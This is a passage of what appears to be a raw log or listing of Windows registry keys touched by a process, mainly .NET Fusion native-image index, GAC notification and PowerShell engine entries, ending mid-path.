HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeI